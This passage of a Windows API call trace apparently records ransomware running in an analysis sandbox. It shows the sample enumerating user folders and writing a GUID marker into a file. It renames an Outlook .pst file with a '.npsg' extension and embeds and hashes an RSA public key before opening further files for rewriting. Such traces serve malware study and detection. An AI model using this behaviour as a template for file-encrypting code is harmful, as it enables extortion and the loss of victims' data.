Flags=0x0, Size=0x108) returned 0x3b7bb78 [0237.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400758 | out: hHeap=0x620000) returned 1 [0237.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0237.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b948 [0237.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0237.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0237.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006c8 | out: hHeap=0x620000) returned 1 [0237.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0237.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0237.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0237.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0237.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0237.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0237.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0237.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0237.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0237.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0237.639] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x42400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.639] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.700] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.700] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.700] CloseHandle (hObject=0x644) returned 1 [0237.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d7c0 [0237.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x3b83cd0 [0237.704] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.npsg")) returned 1 [0237.706] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0237.706] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0237.706] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0237.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7caa0 [0237.706] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0237.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ceb0 [0237.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.706] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="Links\\" [0237.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.707] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0237.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x34093b0 [0237.707] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0237.707] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.707] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.707] PathFindFileNameW (pszPath="") returned="" [0237.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.707] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0237.707] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.707] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0237.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0237.707] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned=".ini" [0237.707] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0237.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0237.708] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned=".url" [0237.708] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.709] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=236) returned 1 [0237.709] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.711] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xc6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.711] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.712] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xec, lpOverlapped=0x0) returned 1 [0237.712] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.712] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.712] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.712] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0237.713] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.713] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.713] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.713] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.713] GetLastError () returned 0x0 [0237.713] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.713] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0237.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.713] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.713] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.714] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xf0) returned 0x33b8188 [0237.714] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0237.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0237.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x34093b0 [0237.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400698 [0237.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x34093f8 [0237.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006b0 [0237.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006e0 [0237.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400740 [0237.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006f8 [0237.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0237.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0237.714] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006e0 | out: hHeap=0x620000) returned 1 [0237.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006f8 | out: hHeap=0x620000) returned 1 [0237.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400740 | out: hHeap=0x620000) returned 1 [0237.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400740 [0237.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0237.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34006f8 [0237.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0237.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34006e0 [0237.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b830 [0237.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0237.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0237.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0237.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0237.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006f8 | out: hHeap=0x620000) returned 1 [0237.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006e0 | out: hHeap=0x620000) returned 1 [0237.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400740 | out: hHeap=0x620000) returned 1 [0237.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0237.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.715] GetCurrentThreadId () returned 0x5b4 [0237.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b82798 [0237.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0237.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0237.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0237.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.716] GetCurrentThreadId () returned 0x5b4 [0237.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33adda8 [0237.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0237.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0237.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0237.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0237.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400740 [0237.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0237.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0237.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0237.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0237.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006e0 [0237.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0237.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0237.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0237.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0237.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34006f8 [0237.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0237.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0237.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0237.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006c8 [0237.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0237.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400758 [0237.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0237.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0237.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400728 [0237.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400710 [0237.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400770 [0237.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400710 | out: hHeap=0x620000) returned 1 [0237.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400710 [0237.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400728 | out: hHeap=0x620000) returned 1 [0237.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0237.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0237.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0237.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006e0 | out: hHeap=0x620000) returned 1 [0237.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34006e0 [0237.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 